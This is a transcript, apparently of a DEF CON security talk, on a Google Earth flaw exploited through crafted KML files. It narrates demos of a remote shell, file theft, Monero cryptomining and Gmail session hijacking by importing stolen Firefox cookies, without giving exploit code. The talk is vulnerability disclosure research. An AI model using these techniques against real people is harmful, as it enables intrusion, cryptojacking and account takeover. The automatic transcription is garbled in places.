 We would like to say first of all, thanks to everybody that made possible to be here, to the DEF CON staff, the Baidu, everybody. This is a dream. Thank you very much. Well, we both are big bags of nervous, so we will try to do our best. Well, presentations. My partner, my colleague, he comes from Argentina. He is one of the members and the red team in Isaac Auditors. We work together and he is a bug bounty hunter since a long time ago. Well, this is his Twitter account and me. I am Gonzalo Sanchez. I come from Spain. I am the red team leader in Isaac Auditors. Well, this is my LinkedIn account in case anybody wants to contact. Hello, DEF CON. Today we present how to address an opponent, Google, with a different compression format. Well, what we are going to talk, we bring to the account vulnerability in Google Earth. Why Google Earth? Well, because Google is a challenge. A very huge company with fantastic products, with a very good reputation, with reliable levels of security in their products. Many people use Google products and if you are able to find vulnerability and use it to spread malware, you are using our platform with a spreading potential, very huge, very big. So, in this case for malware application, it's perfect. Nice Killombo. This is the name of the company. Nice Killombo is a very popular phrase in Argentina, which refers to have one or more problems. Confusion, problem, mess. This is Killombo. Well, the attack vector, KML files. What is a KML file? Well, it's a file with a very similar format to XML with geographical information inside. This is the key import table in Google Earth. We are going to work with the description file of the KML file. We are going to show an example of a file. Please, guys, can you connect the screen? We are going to show a file, an example of KML file with a location that is this hotel. Easy. It's a very similar format compared to, sorry, with XML file. The key here is that we have field files with the location of the hotel, names, what, and here the magic, the description file. This is the file that we are going to use in the next vulnerabilities. Another kind of file for attack vectors came in set is the same of KML file, but compressed with FIP format. If you take the same file that we have seen, you compress it in FIP file and you import it in Google Earth. Google Earth renders the file and shows the location. There is no need to waste time with that. There is an advantage when we talk with KML file that is the obfuscation because the file is compressed and it complicates to identify the payload of the file. They are not suspicious files. We are familiar with executable files talking about malware, but probably if you see a KML file, you don't suspect about this file. This is an advantage for us. It's obfuscated because it's compressed and it's very common in the Internet. We can find a lot of files in the Internet. Where can we find these kinds of files? Well, forums, for example, Pokemon Go, sites of bicycles routes, official sites with geographical information, earthquakes, fires. This is an example of NASA. There's a lot of sharing information in these kind of formats. This scenario. This is the victim and host with Google Earth installed. The victim imports a KML file and into this file comes the downloader. The downloader is executed and communicates with an intermediate server that is communicating with the real attacker, with the real payload that is downloaded by the intermediate server and it's delivered to the victim. After that, the connection directly with the attacker. Versions affected. We have detected this problem with the current versions of Google Earth for Windows and Linux. In this presentation, we are focused on the Windows version. Summary. Location. The vulnerability is present in the JavaScript core of Google Earth. We are talking about a null pointer and also an injection of JavaScript. We are going to see this in detail. We bring three impacts to show. A remote cell and a Google cookie takeover using the null pointer vulnerability and a monero mining using the JavaScript injection. This is a virtual machine that will be the attacker. The victim is my computer. My computer is Windows. This is the virtual machine with the real attacker. The victim has Google Earth and it has imported a site with an arbitrary name. In this case, it's Google One. We have to start the server. The server is the intermediate server. In order to make the presentation easy, the intermediate server and the attacker will be the same machine, this one. The intermediate server is the attacker. This is the intermediate server. The victim has imported and clicked on the site and the connection has received into the intermediate server. We have it and we are going to show the remote server, the impact one. First of all, basic command execution. We will show and we will serve the exploit. DevCon has the exploit and probably will serve when Google fixes this problem. But this is a help to use it. We are going to execute the remote command. Basic operation like example and it's received. Now we can access to files in the victim. The file is downloaded and we have it into the attacker machine. We have access to the victim's file. The file is downloaded and we can check it. This is for the impact one, remote cell and file access into the victim's file. Guys, please return to presentation. Impact two, we are going to use the victim's computer to mine Monero. Here we have a problem because we are using have a script code from CoinHive. Unfortunately, we cannot connect to this site with the internet connection. But we can show at least the K-man file. Here we are not exploiting the null pointer vulnerability. Here we are injecting have a script code into the scripting file. What we are doing here is connect with CoinHive and downloading the have a script code for the Monero mining. When you import this file in Google Earth, machine starts mining and resources collapse. You have a problem with your computer, but as I said, we cannot show this problem because there is a problem with the internet connection in this case. We can continue with the presentation. The last impact is the Google account hijacking. What we are going to do is to take over the cookies of the victims, what we are doing now. Because we have access to the files in the victim's computer, we are accessing for the cookies.sqlite file in the Firefox folder where the victim stores its own Gmail cookies. What do we need in this case? This is a type of social engineering attack because we need that the victim has opened the Firefox browser with an open session in Gmail with this file with the credentials inside. In this attack, the victim with the browser opened with the Gmail account opened imports the camera file in Google Earth and we have access to its cookies file. Now we go to our browser, this is the folder of the attacker because we are going to open the Firefox browser in the attacker PC opening the cookies of the victim. We delete any cookie in the attacker's browser, cookies file, into a sport, the information is sported. We are going to import the format in order to make it easy. The malicious side, something is going wrong. We can show this on a video. If you can see this, this is a virtual machine, windows of the victim. The victim has opened Firefox. Now we are starting the server, saying that we did some seconds ago and the victim clicks on the malicious file. Here the connection is received and now we execute with the getCookie option. Here we have exported the file, here we are exporting this V4. From the Mozilla Cookies table. This is the cookies file of the Mozilla Firefox of the attacker. We are going to drop the table with the cookies of the attacker and we are going to import here the victim's cookies. Drop the current table of Mozilla Cookies and import with the file generated. Open Firefox and we have the session of the victim. Please excuse that we didn't achieve this in live show but it's so difficult to achieve it. So these are the three impacts that we wanted to show. It's a short description in order when death concerns the exploit to everybody. The malicious game of fire we have seen so many times this morning. This is the server, the internet server that receives the communications from the victim and this is the attacker, this is the python that has mainly all the functionality. Everything is developed in python and this is the structure of the exploit. Many thanks for everything. Incredible hard two days with a lot of problems with connections and what it was hard for us to bring but at least we could show you this material. So thank you very much for everybody special, for the guys that helped us in the last hour. Hector Paulino, a lot of people. Thank you everybody to be here and give us the opportunity to tell this and show this. I hope you enjoy with the material. Thanks.